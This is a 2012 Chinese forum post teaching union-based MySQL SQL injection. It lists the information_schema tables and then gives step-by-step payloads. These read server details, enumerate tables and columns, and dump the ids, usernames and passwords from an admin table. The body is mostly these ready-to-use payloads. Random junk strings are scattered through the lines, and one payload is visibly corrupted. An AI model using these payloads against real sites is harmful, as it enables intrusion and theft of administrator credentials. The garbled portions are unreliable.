找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1899|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法
% H( R$ ^. {' V( X
' P# X/ i  d% k8 r6 \学习盲注前先了解下 IFORMATION_SCHEMA 库+ F$ @* x( e6 e/ q5 `5 D+ s) k6 Q

/ x) y% c& O- ?# C, ~Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
4 J( z! ~) a+ T& z* ^% q存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。$ _" w$ m* }4 X+ d( i# H1 U
1.得到所有数据库名:
4 X9 z# @% J' F/ `- m; t8 k|SCHEMATA ->存储数据库名的表7 s) u  V& q4 e& [8 R2 p" A# J' E  B
|---字段:SCHEMA_NAME ->数据库名称! O: p; G) s9 I0 q
7 j) f6 z1 N' W; o4 F" M
|TABLES ->存储表名1 i8 K- O. |9 c7 k
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名# U9 s8 ?$ q" k5 d1 \2 p
|---字段:TABLE_NAME ->存储表的表名6 c# ]- w8 ^3 X

4 U# }* l' O: Y" f+ }|COLUMNS ->存储的字段名表5 v' h* M; B! B& j8 Y
|---字段:TABLE_SCHEMA ->该字段所属数据库名
* v& P* D. G% ?6 }7 _( q; j|---字段:TABLE_NAME ->存储所属表的名称, o5 l9 L& o  L  S; p

2 d) G7 b! A5 p% J* d- ?; z  ~|---字段:COLUMN_NAME ->该字段的名称
- m+ B; @  K9 e2 ?# I' l/ q
+ d! o( e% \/ `$ U3 F . J8 o: L5 s' X7 |

1 J- g9 C; r& ^###########################################################################
7 P; ?0 }) B* D+ V
8 |* C, X+ p" p0x001 获取系统信息:
: A3 {9 [2 X5 D1 O! E! z( x/ g
% P6 P/ {& U' Q) u5 \# V3 e- vunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
3 h3 K6 V1 t- k4 v1 ?  a7 o  @/ u* Y2 D4 |  |5 O. {6 O% I' w1 P
/*# c0 ^4 ^) `" Z* p5 L

4 ^& B6 z$ v9 g" P@@global.version_compile_os 获取系统版本
) r2 A7 z, z2 ?7 Z3 C( k2 Z, r
) x: P, {( R; Z" b  [+ T+ B* n@@datadir 数据库路径
* g7 Y7 u. z  |8 p; udatabase() 当前数据库名称0 ^3 U5 t& V# Z9 W  z
0x3c62723e 换行HEX值) W0 B& c+ i. X' G; h9 p
5 _: N, {+ f) ]8 Q; v
*/1 D  l$ ~, Q" M; i8 k" N/ y

* P& b- u. }3 M8 q7 f- i % f7 B% H  P: S2 r
% R! G# n5 y. R2 R3 {
######################################################################
/ Y( d! _$ \# W* d9 Y# j
) x2 X+ ^( J5 L8 y* T% c0x002 获取表名# A! |( D: c0 c

) E" l4 J* k& a- T8 A' X8 t5 p+ junion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
7 a8 b+ }* Y1 I2 C( `9 Y
4 D: k3 M7 I* W
+ A* H6 s9 J. d! F6 m2 f
8 P* t. G% [! h' v* Y1 e% p  V0 R* S/*
& a+ N9 s! l" G/ e+ F, F# f+ g% V: s; m
0x67617264656e 为当前数据库名3 o) a$ I3 X$ i. O+ Y

! L8 u) }& D5 t: S4 P! Lgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名: _* o1 t# S6 F7 E; l; x
% O" {* U2 o. X* X" a
*/
; \* p9 u/ I- e( U+ f) \$ E' Q+ \0 N' V# K, e3 g
######################################################################
+ n4 N0 K0 X8 a# l  P# P3 Z( w" t( d8 D

8 `( Z$ a- ^* P  Q0 w6 s2 I& b% ~, j7 A0 h1 @! j: K, F
0x003 获取字段
* I! R% n. T% M2 u; U. b2 f5 |  }3 J: S/ J7 P7 ^6 V: A
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*. G; {. Y$ M  `
4 H$ D* C; [2 M
/*& g) L/ \& N) s0 f

0 V8 h$ Z7 w* tgroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
/ S# x9 C. [* _& y$ Q8 u. ?0 g8 c0 {) E+ N9 ~% R
0x61646d696e ->选择一个表
' f# @2 o) s: v$ G7 w( B" ~* R
$ O, A6 J+ f6 d$ F$ q0x67617264656e ->数据库名3 U9 n  I: ?  E& I

) L7 P. M! q0 H) j2 T*/; P  F7 S* Q8 R4 r
9 a# I; y4 \- o' D7 Q) W
#####################################################################7 R& N# X4 t/ u: t0 h  W

3 ]3 P2 ]7 C' }- Z( |( J# X0 T7 z1 t6 e
" p# |. b6 ?7 S# x! P. I
2 S! v9 [. a2 c, y. |* ~0x004 获取数据
, `2 k# c4 u' m. g! f* `) T8 c' }# K5 j
& d$ {4 S! x  {: p+ zunion select 1,2,3
% _" g/ D* w1 H) q4 G,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin# f1 {$ m' r) X; K( @

9 u. ^% G4 |% ?  yunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin1 d, k  O+ }8 G5 \$ x
" {# x# t( X$ V: V2 D
0 Q2 q1 d  p2 {

' @  B( F% F" G# |. O0 d" N0 `/*0 Y0 ~$ ~6 L% d- e6 E) c: W
8 U% L1 n( W$ K
0x3c62723e 换行符号HEX编码
9 {0 i7 {$ @) q( F  z& S1 z' v/ T0 {- w0 @( N; M
group_concat 同时获得该字段所有数据. x  h( {- s7 |: X: a. G# S

2 p8 F8 D+ c, x1 y*/# ?5 p" v  P  j6 c) y" f9 e& d
- u% I' @$ S5 k$ D( k6 e* Q, H9 t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表